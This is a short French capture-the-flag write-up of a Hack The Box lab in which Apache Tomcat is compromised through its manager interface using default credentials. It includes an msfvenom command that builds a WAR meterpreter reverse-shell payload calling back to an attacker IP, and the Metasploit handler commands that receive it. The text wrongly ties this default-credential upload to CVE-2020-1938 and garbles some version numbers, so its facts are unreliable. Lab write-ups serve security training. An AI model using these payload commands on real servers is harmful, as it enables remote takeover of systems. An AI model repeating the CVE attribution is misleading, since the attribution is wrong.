
Guide pas à pas pour l'exploitation de CVE-2020-1938 (téléchargement arbitraire JSP vers RCE sur Apache Tomcat) en utilisant msfvenom et Metasploit dans un environnement de laboratoire Hack The Box.
CVE-2020-1938 est une vulnérabilité critique qui impacte Apache Tomcat de 9.0.0.M1 à 9.0.0.30, 8.5.0 à 8.5.50 et 7.0.0 à 7.0.99 ⚠️ Cette vulnérabilité a été exploitée dans un lab Hack The Box.
🔗 Référence : Entrée NIST NVD
Le site web dispose d'identifiants par défaut pour la fonctionnalité Server Status.
Cette interface indique que la version est Apache Tomcat/7.0.88, architecture 64 bits.
À partir de cette interface, nous naviguons pour lister les applications, ce qui expose une fonctionnalité de téléchargement de fichiers .war.
En cas de téléchargement réussi, le fichier .war est exécuté à l'emplacement /directory/filename.
Des recherches sur la version d'Apache Tomcat ont confirmé la vulnérabilité à CVE-2020-1938
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.3 LPORT=3004 -f war -o exploit.war
En utilisant msfvenom, un générateur de charges utiles Metasploit, nous générons notre charge utile exploit.war.
Après la génération du fichier, ouvrez-le et trouvez le nom du fichier .jsp, par exemple gcvxdtmxvw.jsp, et conservez-le pour plus tard.
msfconsole
use exploit/multi/hanlder
Set LHOST 10.10.14.3
Set LPORT 3004
Avec msfconsole, nous configurons un écouteur qui attend l'exécution de notre charge utile.


Nous téléchargeons notre image dans la section de déploiement, après quoi nous actualisons l'écran et constatons que le fichier a bien été téléchargé. Pour terminer l'exploitation, nous devons naviguer vers le chemin ip/hacked/gcvxdtmxvw.jsp.

Cela bloque la requête, mais nous pouvons voir localement sur notre machine que nous avons une connexion inverse.